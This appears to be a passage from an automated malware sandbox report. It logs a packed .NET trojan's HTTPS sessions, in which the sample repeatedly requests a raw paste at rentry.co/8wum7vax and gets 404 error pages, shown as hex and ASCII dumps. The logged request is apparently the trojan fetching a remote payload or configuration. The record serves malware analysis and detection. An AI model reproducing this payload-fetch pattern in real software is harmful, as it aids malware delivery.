                                                                                        2024-10-18 10:43:22 UTC711INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:43:22 UTC1369INData Raw: 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72
                                                                                        Data Ascii: eta property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <meta pr
                                                                                        2024-10-18 10:43:22 UTC1369INData Raw: 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20 20 20 20 20 20 20
                                                                                        Data Ascii: ; script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth">
                                                                                        2024-10-18 10:43:22 UTC1011INData Raw: 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 64 34 66 33 38 32 34 33 61 61 61 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 49 77 4d 69 34 77 4d 44 41 77
                                                                                        Data Ascii: tstrap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47ed4f38243aaa',t:'MTcyOTI0ODIwMi4wMDAw
                                                                                        2024-10-18 10:43:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        37192.168.2.660685104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:43:23 UTC71OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-18 10:43:24 UTC675INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:43:24 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        vary: accept-encoding
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        cf-cache-status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pMOTx5CNbHBicFVcWJMpBgur8xSIr7z6vX76tCaHdezKNZ7xIaHp1G%2FYFvgfICfoLxGfwKNZ0Clla7kww5iPwQFUfSiiyMqHQ1XkaxJDDnRJXbAF7DMUN6IOzQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47ed5a8b3a478c-DFW
                                                                                        2024-10-18 10:43:24 UTC694INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:43:24 UTC1369INData Raw: 32 2e 70 6e 67 22 20 2f 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e
                                                                                        Data Ascii: 2.png" /> <meta property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing.
                                                                                        2024-10-18 10:43:24 UTC1369INData Raw: 67 27 20 7c 7c 20 27 72 65 6e 74 72 79 2e 63 6f 27 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d
                                                                                        Data Ascii: g' || 'rentry.co'; script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-sm
                                                                                        2024-10-18 10:43:24 UTC1028INData Raw: 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 64 35 61 38 62 33 61 34 37 38 63 27 2c 74 3a 27 4d 54 63
                                                                                        Data Ascii: c="/static/js/bootstrap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47ed5a8b3a478c',t:'MTc
                                                                                        2024-10-18 10:43:24 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        38192.168.2.660686104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:43:25 UTC71OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-18 10:43:25 UTC654INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:43:25 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SVpjllh3HuT4fABaWtHC%2B1iLP0r2OyNy0VgWiUsgHv%2FiVbZWTQFMZDn81vnFjEApN9iAMQZfCmYpGe3mMuxZmHfrxtP2DaohGybPweW7LqinIiOw5gmyglnU3A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47ed634e996c1a-DFW
                                                                                        2024-10-18 10:43:25 UTC715INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:43:25 UTC1369INData Raw: 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72
                                                                                        Data Ascii: property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <meta proper
                                                                                        2024-10-18 10:43:25 UTC1369INData Raw: 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64
                                                                                        Data Ascii: ript.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth"> <d
                                                                                        2024-10-18 10:43:25 UTC1007INData Raw: 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 64 36 33 34 65 39 39 36 63 31 61 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 49 77 4e 53 34 77 4d 44 41 77 4d 44 41 3d
                                                                                        Data Ascii: ap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47ed634e996c1a',t:'MTcyOTI0ODIwNS4wMDAwMDA=
                                                                                        2024-10-18 10:43:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        39192.168.2.660688104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:43:27 UTC71OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-18 10:43:28 UTC664INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:43:28 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kpr3uAYeC5pALB8YbUgYc3AMrU7veUk2JIZMySHGhqMn7vLVvdR%2FVwaRZX4%2F6vn%2BS1ElDN%2Balz4yE%2FdBL%2FrjyxutmhU03qCnKKb8s9vvPoXS%2BWl781WGBbEXUg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47ed70dae8ddb0-DFW
                                                                                        2024-10-18 10:43:28 UTC705INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                                                        Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                                                        2024-10-18 10:43:28 UTC1369INData Raw: 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d
                                                                                        Data Ascii: <meta property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <m
                                                                                        2024-10-18 10:43:28 UTC1369INData Raw: 72 79 2e 63 6f 27 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 20 62 6f 64 79 22 3e 0a 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 75 62 2d 62 6f 64 79 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20
                                                                                        Data Ascii: ry.co'; script.defer = true; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0 body"> <div class="sub-body"> <div class="container container-smooth">
                                                                                        2024-10-18 10:43:28 UTC1017INData Raw: 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 64 34 37 65 64 37 30 64 61 65 38 64 64 62 30 27 2c 74 3a 27 4d 54 63 79 4f 54 49 30 4f 44 49 77 4f 43
                                                                                        Data Ascii: js/bootstrap.min.js?vsson=24"></script> </div><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8d47ed70dae8ddb0',t:'MTcyOTI0ODIwOC
                                                                                        2024-10-18 10:43:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        40192.168.2.660689104.26.3.164431436C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2915.5813.28001.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-18 10:43:29 UTC71OUTGET /8wum7vax/raw HTTP/1.1
                                                                                        Host: rentry.co
                                                                                        Connection: Keep-Alive
                                                                                        2024-10-18 10:43:29 UTC662INHTTP/1.1 404 Not Found
                                                                                        Date: Fri, 18 Oct 2024 10:43:29 GMT
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        vary: Origin
                                                                                        x-xss-protection: 1; mode=block
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E5uI%2FI363q%2BswQGrURMjoqzDJMq%2B19BPbEYJ0HzMy%2FsLf1lx3B2MBUL0bw%2BlfU9H8XwjRdH7OO05s50W8Qr4YjNNDjnplwn9%2Fe7mVbXOGWonNguAJPaa5eN6FA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8d47ed7c3867a915-DFW
